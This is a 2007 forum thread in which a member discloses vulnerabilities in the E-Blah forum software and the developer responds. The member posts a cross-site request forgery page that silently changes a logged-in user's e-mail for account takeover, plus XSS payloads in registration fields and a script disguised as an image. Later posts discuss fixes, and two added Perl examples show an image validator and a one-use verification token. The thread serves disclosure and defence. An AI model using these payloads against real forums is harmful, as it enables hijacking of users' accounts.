d4rksn4k3
September 20, 2007, 8:55am
E-Blah Member
Posts: 4
Posts Per Day: 0.01
Time Online: 4 days 5 hours 27 minutes
Code
<!-- PoC as posted: a page hosted on another site that auto-submits a POST to the victim forum's
     profile-save URL. A member who is logged in to the forum and loads this page gets their
     e-mail changed without any prompt, because the save action takes no token or password. -->
<form action="http://[sitevictim].it/forum/v-memberpanel/a-save/as-profile/s-contact/u-6064/" method="post" id="post" enctype="multipart/form-data">
<input type="text" name="email" value="[email@hacker].com" size="25" maxlength="80" />
<input type="text" name="icq" value="" maxlength="30" size="20" />
<input type="text" name="aim" value="" maxlength="30" />
<input type="text" name="yim" value="" maxlength="30" />
<input type="text" name="msn" value="" maxlength="40" />
<input type="text" name="skype" value="" maxlength="30" />
<input type="hidden" name="caller" value="1" />
<input type="submit" name="save" value=" Save " />
</form>
<!-- submit() runs as soon as this script is parsed; the form above already exists by then -->
<script> document.body.onload = document.forms[0].submit(); </script>
Justin
September 20, 2007, 1:31pm
Posts: 15,075
Gender: Male
Posts Per Day: 6.52
Reputation: 93.40%
Reputation Score: +297 / -21
Time Online: 36 days 23 hours 27 minutes
Location: Tallassee, AL
Age: 22
d4rksn4k3
September 21, 2007, 2:40am
E-Blah Member
Posts: 4
Posts Per Day: 0.01
Time Online: 4 days 5 hours 27 minutes
The code changes the user's e-mail. The hacker can then use: Forgot password.
P.S. Excuse my wording, I am not English.
d4rksn4k3
September 21, 2007, 3:12am
E-Blah Member
Posts: 4
Posts Per Day: 0.01
Time Online: 4 days 5 hours 27 minutes
XSS to Administration Panel
Code
// ActionScript 2 as posted: every timeline variable in scope is sent as a POST field by getURL,
// so the registration form receives script tags in the username and e-mail fields.
var username:String = "\"><script>alert('XSS');</script>";
var email:String = "\"><script>alert('Double XSS');</script>";
var validemail:String = "";
var password:String = "";
var password:String = "";   // duplicated in the original post; the second field's real name is not given
var random:String = "";
var randomconfirm:String = "";
var agree:String = "1";     // the "=" was missing in the original
// the submit field's name is missing in the original post; its value was " Register "
getURL("http://[sitevictim]/[path].com/Blah.pl?v-register/p-2/", "_self", "POST");
Code
http://img215.imageshack.us/my.php?image=eblahxssgs4.jpg
d4rksn4k3
September 21, 2007, 3:27am
E-Blah Member
Posts: 4
Posts Per Day: 0.01
Time Online: 4 days 5 hours 27 minutes
XSS to Attachment: File image.gif
Code
<script>alert('XSS');</script>
Open it with Internet Explorer.
Justin
September 21, 2007, 10:41am
Posts: 15,075
Gender: Male
Posts Per Day: 6.52
Reputation: 93.40%
Reputation Score: +297 / -21
Time Online: 36 days 23 hours 27 minutes
Location: Tallassee, AL
Age: 22
I'm still not sure I follow. This would work in IE only if the user actually clicks it (the code won't be executed on the page). This is a problem with IE's handling of these files. The content-type is not sent as HTML or JavaScript. Firefox doesn't execute it because it's supposed to be an image, not code.
The first code: I'm aware that you can do that and then go to "Forget Password", but my point was that the code would have to be placed on a foreign website. Any attached HTML files are changed to .txt files so they can't be run as webpages.
The registration page that you see in the Admin Center would not be what any hacker would be able to see, because the registration page checks whether you are an Administrator. So that one wouldn't work.
I do installs for $25 and upgrades for $20. Technical support is always free. Donate to E-Blah! My Websites: Revolution Reality (My Blog) | MinistryTalk.com | Portfolio. "But you, O Lord, are a compassionate and gracious God, slow to anger, abounding in love and faithfulness." — Psalm 86:15 NIV
Vzx
September 22, 2007, 7:23am
Posts: 33
Gender: Male
Posts Per Day: 0.03
Reputation: 100.00%
Reputation Score: +2 / -0
Time Online: 1 days 24 minutes
Location: Russia
I think the exploit for the Admin panel is not noteworthy. But the two other issues are interesting... Though JavaScript as an image is not E-Blah's problem, it's somewhat dangerous. I think the easiest way is to check attached images by means of some image library, to get the image type and its resolution, and if these parameters are not valid, then the image is "bad". The first code is interesting too... A bad guy can put a link to his website on the forum and insert a list of actual IDs/usernames in an iframe, for example. So when you follow the link, the e-mail address in your profile will really change. I think it's necessary to add some verification in the member panel. For example, to ask for the password before any change to such significant information as an e-mail address.
Justin
September 22, 2007, 9:20am
Posts: 15,075
Gender: Male
Posts Per Day: 6.52
Reputation: 93.40%
Reputation Score: +297 / -21
Time Online: 36 days 23 hours 27 minutes
Location: Tallassee, AL
Age: 22
> I think it's necessary to add some verification in the member panel. For example, to ask for the password before any change to such significant information as an e-mail address.
That's a great idea; that can be added to the Administrator password validation stuff. I'll work on it for a few minutes and see what I can come up with.
Vzx
September 22, 2007, 10:38am
Posts: 33
Gender: Male
Posts Per Day: 0.03
Reputation: 100.00%
Reputation Score: +2 / -0
Time Online: 1 days 24 minutes
Location: Russia
Justin, thank you! We'll be waiting for news from you! And what do you think about the issue with images in Internet Explorer? There are many solutions in Perl on the Internet for quickly grabbing information about images (resolution, type of image, etc.). d4rksn4k3, thank you for the interesting research!
Justin
September 22, 2007, 11:10am
Posts: 15,075
Gender: Male
Posts Per Day: 6.52
Reputation: 93.40%
Reputation Score: +297 / -21
Time Online: 36 days 23 hours 27 minutes
Location: Tallassee, AL
Age: 22
I've enabled it. I hope this isn't too much of a nuisance, but it will help to better protect forums. Only administrators will get the password verification. The verification will be JUST like the main verification that is used to access other areas, only this one will be a "one use" verification and will expire one hour after it has been submitted. Only Administrator accounts will need to be verified for e-mail and password changes. This means that any normal user will not need to verify their password, nor will Administrators need to validate their passwords if they are editing regular users. However, if the administrator options are being edited, administrators will always need to validate. This can be expanded to include other areas, so feel free to give me ideas about other areas. It will be online tonight on the nightly site. Please test it and let me know if there's anything that can be done to improve it.
Justin
September 22, 2007, 11:12am
Posts: 15,075
Gender: Male
Posts Per Day: 6.52
Reputation: 93.40%
Reputation Score: +297 / -21
Time Online: 36 days 23 hours 27 minutes
Location: Tallassee, AL
Age: 22
> And what do you think about the issue with images in Internet Explorer? There are many solutions in Perl on the Internet for quickly grabbing information about images (resolution, type of image, etc.).
Not all users have GD or ImageMagick; that's why I'm not adding that. Plus, there are times when GD can't get the dimensions correct. It's a good idea though.
Vzx
September 22, 2007, 12:42pm
Posts: 33
Gender: Male
Posts Per Day: 0.03
Reputation: 100.00%
Reputation Score: +2 / -0
Time Online: 1 days 24 minutes
Location: Russia
> Not all users have GD or ImageMagick; that's why I'm not adding that.
I think this function should be available in the Admin panel as an option. If a user has GD/ImageMagick, he'll be able to activate this function at his own discretion to increase security on the forum. And I saw a few simple modules for determining the resolution of the usual types of images; I'll test them as far as possible. Nevertheless, I think GD or ImageMagick are better for these purposes...
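Vzx's suggestion above, and the GD/ImageMagick concern Justin raised, can be met without either library. The following is an added example, not E-Blah's code: it reads the GIF, PNG or JPEG header in pure Perl and rejects anything that does not parse as an image, such as the script-in-image.gif attachment from this thread. The sample bytes and the 4096-pixel limit are constructed for the demo.

```perl
# Added example, not E-Blah code: recognise GIF/PNG/JPEG by header bytes and read
# the dimensions in pure Perl, so the check works without GD or ImageMagick.
use strict; use warnings;
# Returns (type, width, height), or an empty list when the data is not an image.
sub image_info {
    my ($data) = @_;
    return unless defined $data && length $data >= 10;
    if ($data =~ /^GIF8[79]a/) {                       # GIF: 6-byte signature, then LE u16 w,h
        return ('gif', unpack 'x6 v v', $data);
    }
    if (substr($data, 0, 8) eq "\x89PNG\r\n\x1a\n") {   # PNG: signature, then IHDR with BE u32 w,h
        return unless length $data >= 24 && substr($data, 12, 4) eq 'IHDR';
        return ('png', unpack 'x16 N N', $data);
    }
    if (substr($data, 0, 2) eq "\xFF\xD8") {            # JPEG: walk segments to a SOFn frame header
        my $pos = 2;
        while ($pos + 4 <= length $data) {
            return unless substr($data, $pos, 1) eq "\xFF";
            my $marker = ord substr($data, $pos + 1, 1);
            if ($marker == 0xFF) { $pos++; next }        # fill byte before a marker
            my $len = unpack 'n', substr($data, $pos + 2, 2);
            if ($marker >= 0xC0 && $marker <= 0xCF && $marker != 0xC4 && $marker != 0xC8 && $marker != 0xCC) {
                return unless $pos + 9 <= length $data;
                my ($h, $w) = unpack 'n n', substr($data, $pos + 5, 4);
                return ('jpeg', $w, $h);
            }
            $pos += 2 + $len;
        }
    }
    return;                                              # HTML, script, text: not an image
}
# Accept an attachment only if it parses as an image with sane dimensions.
sub is_safe_image {
    my ($data, $max_side) = @_;
    $max_side ||= 4096;
    my ($type, $w, $h) = image_info($data);
    return defined $type && $w > 0 && $h > 0 && $w <= $max_side && $h <= $max_side ? 1 : 0;
}
# Constructed samples: the script-in-image.gif attachment from this thread, plus two real headers.
my %sample = (
    'image.gif (script)' => "<script>alert('XSS');</script>",
    'real gif header'    => 'GIF89a' . pack('v v', 10, 20),
    'real png header'    => "\x89PNG\r\n\x1a\n" . pack('N', 13) . 'IHDR' . pack('N N', 640, 480),
);
for my $name (sort keys %sample) {
    my ($t, $w, $h) = image_info($sample{$name});
    printf "%-20s %s\n", $name, is_safe_image($sample{$name}) ? "$t ${w}x$h" : 'rejected (not an image)';
}
```

Run on a real upload, the first branch that does not match falls through to the final return, so a file that starts with HTML or script is rejected before it is ever stored as image.gif.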
Vzx
September 22, 2007, 12:55pm
Posts: 33
Gender: Male
Posts Per Day: 0.03
Reputation: 100.00%
Reputation Score: +2 / -0
Time Online: 1 days 24 minutes
Location: Russia
> Only Administrator accounts will need to be verified for e-mail and password changes. This means that any normal user will not need to verify their password, nor will Administrators need to validate their passwords if they are editing regular users.
Justin, please, could you extend this verification option to all regular users too? Some users on my forums have thousands of messages; their accounts are more important than even admin accounts...
Vzx
September 22, 2007, 1:24pm
Posts: 33
Gender: Male
Posts Per Day: 0.03
Reputation: 100.00%
Reputation Score: +2 / -0
Time Online: 1 days 24 minutes
Location: Russia
> The verification ... will expire one hour after it has been submitted.
Is there any way to decrease this period? It's very long in my opinion. 10 minutes is more than enough.
> This can be expanded to include other areas
What do you think, maybe it's better to protect the member center completely? For example, bad guys may use the signature field in an effort to publish short "detractive" material in all messages of the user..
> Please test it and let me know if there's anything that can be done to improve it.
Thanks! We'll see.
Justin
September 22, 2007, 2:01pm
Posts: 15,075
Gender: Male
Posts Per Day: 6.52
Reputation: 93.40%
Reputation Score: +297 / -21
Time Online: 36 days 23 hours 27 minutes
Location: Tallassee, AL
Age: 22
Well, the user would have to have their verification ID (it's in the URL) along with the verification ID inside their member id for it to be effective, so one hour isn't that bad, I don't think. I was thinking of expanding it to other Admin Center areas.
If it gets too crazy, people wouldn't like it though. It's really annoying having to validate a lot.
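An added example, not E-Blah's code, of the scheme Justin describes in his two posts above: a one-use verification ID that is carried in the URL and also stored in the member record, and that expires one hour after it was issued. It assumes a Unix host for /dev/urandom, assumes the password re-entry check happens before issue_verification is called, and uses a constructed member record and timestamp.

```perl
# Added example, not E-Blah code: a one-use verification ID placed in the URL and also
# stored in the member record, expiring one hour after it was issued.
use strict; use warnings;
use Digest::SHA qw(sha256_hex);
use constant TTL => 3600;                       # one hour, as in the thread
# 32 random bytes from /dev/urandom (assumption: a Unix host), hashed to a hex token.
sub new_token {
    my $raw = '';
    if (open my $fh, '<:raw', '/dev/urandom') { read $fh, $raw, 32; close $fh }
    die "no random source" unless length $raw == 32;
    return sha256_hex($raw);
}
# Called only after the member has re-entered their password (that check is assumed to
# happen before this, using the forum's existing password validation).
sub issue_verification {
    my ($member, $now) = @_;
    my $token = new_token();
    $member->{verify_id}   = $token;            # stored copy, compared against the URL copy
    $member->{verify_time} = $now;
    return $token;                              # this goes into the one-use URL
}
# True once, and only while the token is fresh; the stored copy is burnt on success.
sub check_verification {
    my ($member, $url_token, $now) = @_;
    my $stored = $member->{verify_id};
    return 0 unless defined $stored && defined $url_token && length $stored == length $url_token;
    return 0 if $now - $member->{verify_time} > TTL;
    my $diff = 0;                               # constant-time compare of the two copies
    $diff |= ord(substr $stored, $_, 1) ^ ord(substr $url_token, $_, 1) for 0 .. length($stored) - 1;
    return 0 if $diff;
    delete @{$member}{qw(verify_id verify_time)};
    return 1;
}
# The e-mail change from the thread's first post is refused unless a valid ID is present,
# so a forged cross-site form (which cannot know the ID) changes nothing.
sub change_email {
    my ($member, $new_email, $url_token, $now) = @_;
    return 'denied' unless check_verification($member, $url_token, $now);
    $member->{email} = $new_email;
    return 'ok';
}
my %member = (id => 6064, email => 'member@example.com');   # constructed member record
my $t0 = 1_190_500_000;                                     # constructed timestamp
print change_email(\%member, 'attacker@example.com', undef, $t0), "\n";     # forged request: denied
my $id = issue_verification(\%member, $t0);
print change_email(\%member, 'new@example.com', $id, $t0 + 600), "\n";      # ok
print change_email(\%member, 'again@example.com', $id, $t0 + 601), "\n";    # denied: already used
$id = issue_verification(\%member, $t0);
print change_email(\%member, 'late@example.com', $id, $t0 + TTL + 1), "\n"; # denied: expired
```

Shortening the window Vzx asked about is a one-line change to TTL; the one-use burn is what stops a captured URL from being replayed within the window.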